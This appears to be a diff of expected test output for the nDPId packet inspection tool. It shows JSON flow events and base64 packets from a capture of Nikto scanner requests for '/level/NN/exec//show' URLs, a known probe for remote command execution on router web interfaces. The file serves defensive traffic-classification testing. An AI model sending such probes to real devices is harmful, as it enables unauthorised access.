-01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277600,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/28\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001275)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277600,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/28\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001275)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277602,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":1,"flow_last_seen":1576420277602,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277602,"pkt":"AAAAAAAAAAAAAAAACABFAADIalZAAEAG0dd\/AAABfwAAAcYcH5BVA1KtKWKiFYAYAED+vAAAAQEICp1m\/oqdZv6JR0VUIC9sZXZlbC8yOS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277602,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/29\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001276)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277602,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/29\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001276)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277604,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":1,"flow_last_seen":1576420277604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277604,"pkt":"AAAAAAAAAAAAAAAACABFAADIeUZAAEAGwud\/AAABfwAAAcYeH5Dj\/UG+lxmHS4AYAED+vAAAAQEICp1m\/oudZv6LR0VUIC9sZXZlbC8zMC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277604,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/30\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001277)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277604,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/30\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001277)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277607,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":1,"flow_last_seen":1576420277607,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277607,"pkt":"AAAAAAAAAAAAAAAACABFAADISctAAEAG8mJ\/AAABfwAAAcYgH5D3W3ExGI1+2IAYAED+vAAAAQEICp1m\/o6dZv6OR0VUIC9sZXZlbC8zMS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzgpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277607,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/31\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001278)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277607,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/31\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001278)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277608,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":1,"flow_last_seen":1576420277608,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277608,"pkt":"AAAAAAAAAAAAAAAACABFAADIARxAAEAGOxJ\/AAABfwAAAcYiH5DcsTnhkT\/ypIAYAED+vAAAAQEICp1m\/pCdZv6QR0VUIC9sZXZlbC8zMi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277608,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/32\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001279)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277608,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/32\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001279)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277609,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":1,"flow_last_seen":1576420277609,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277609,"pkt":"AAAAAAAAAAAAAAAACABFAADIVW1AAEAG5sB\/AAABfwAAAcYkH5Dpym2S0+8SfoAYAED+vAAAAQEICp1m\/pGdZv6RR0VUIC9sZXZlbC8zMy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjgwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277609,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/33\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001280)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277609,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/33\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001280)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277611,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":1,"flow_last_seen":1576420277611,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277611,"pkt":"AAAAAAAAAAAAAAAACABFAADIEPFAAEAGKz1\/AAABfwAAAcYmH5CKoygWHO02yYAYAED+vAAAAQEICp1m\/pOdZv6TR0VUIC9sZXZlbC8zNC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277611,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/34\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001281)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277611,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/34\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001281)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277612,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":1,"flow_last_seen":1576420277612,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277612,"pkt":"AAAAAAAAAAAAAAAACABFAADILGdAAEAGD8d\/AAABfwAAAcYoH5DpvhSfS8jZeYAYAED+vAAAAQEICp1m\/pSdZv6UR0VUIC9sZXZlbC8zNS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODIpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277612,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/35\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001282)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277612,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/35\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001282)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277614,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
